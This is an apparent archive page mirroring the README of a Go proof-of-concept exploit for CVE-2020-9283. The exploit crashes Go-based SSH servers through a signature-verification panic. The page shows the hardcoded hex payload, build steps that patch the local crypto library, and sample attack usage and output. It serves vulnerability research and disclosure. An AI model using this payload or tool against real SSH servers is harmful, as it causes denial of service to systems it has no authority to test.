Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2020-9283 PoC — Golang Go crypto 数据伪造问题漏洞

Source
https://github.com/brompwnie/CVE-2020-9283
Associated Vulnerability
Title:Golang Go crypto 数据伪造问题漏洞 (CVE-2020-9283)
Description:golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.
Description
Exploit for CVE-2020-9283 based on Go
Readme
# Exploit for CVE-2020-9283  

This project is inspired by the original POC found here github.com/mark-adams/exploits/CVE-2020-9283.
I was curious as to how the Go SSH library was implemented so decided to implement the PoC using go.

A short writeup can be found here https://dev.to/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7

# What does this do?

This invokes a panic on a Go based SSH server which may lead to a DoS. 

# Installation

I've released binaries in the Release section however you can rebuild your own using the source code attached.

## Building the sources
I decided to modify the Go crypto library directly on my system to understand how it works, this is not ideal and probably not the best way to do this but it works ;) If you want to rebuild using GO modules, replace the contents of the Crypto/ssh files client_auth.go, handshake.go, transport.go on your local system with the ".bak" files located here. These modified files contain verbose debugging output and a hardcoded payload of "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161" which triggers the panic.

# Usage
You will see lots of debugging output and "errors", this is expected. If your target has panic'd, you should see errors associated to "bad key lengths". If you want to test this locally, use the vulnerable code that can be found here github.com/mark-adams/exploits/CVE-2020-9283

```
# ./CVE-2020-9283 -h
Usage of ./CVE-2020-9283:
  -host string
        IP address of SSH host to target (default "localhost")
  -key string
        ssh-ed25519 private key to use (default "thekey")
  -port string
        Port to target (default "22")

# ./CVE-2020-9283 -port=2022
./CVE-2020-9283 -port=2022
+] Sploit for CVE-2020-9283
[+] Attempting to pwn: localhost:2022
[!] Attempting: cMSG_USERAUTH_REQUEST
[+] userAuthRequestMsg User:  notme
[+] userAuthRequestMsg Service:  ssh-connection
[ERROR] ssh: handshake failed: EOF
[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'

```
File Snapshot

 [4.0K]  /data/pocs/0a3142ae02d3b8a652d8b087e9e865f96738d61b
├── [ 20K]  client_auth.go.bak
├── [8.7K]  client.go.bak
├── [ 115]  go.mod
├── [ 824]  go.sum
├── [ 16K]  handshake.go.bak
├── [1.7K]  main.go
├── [1.5K]  Makefile
├── [2.0K]  README.md
└── [9.3K]  transport.go.bak

0 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →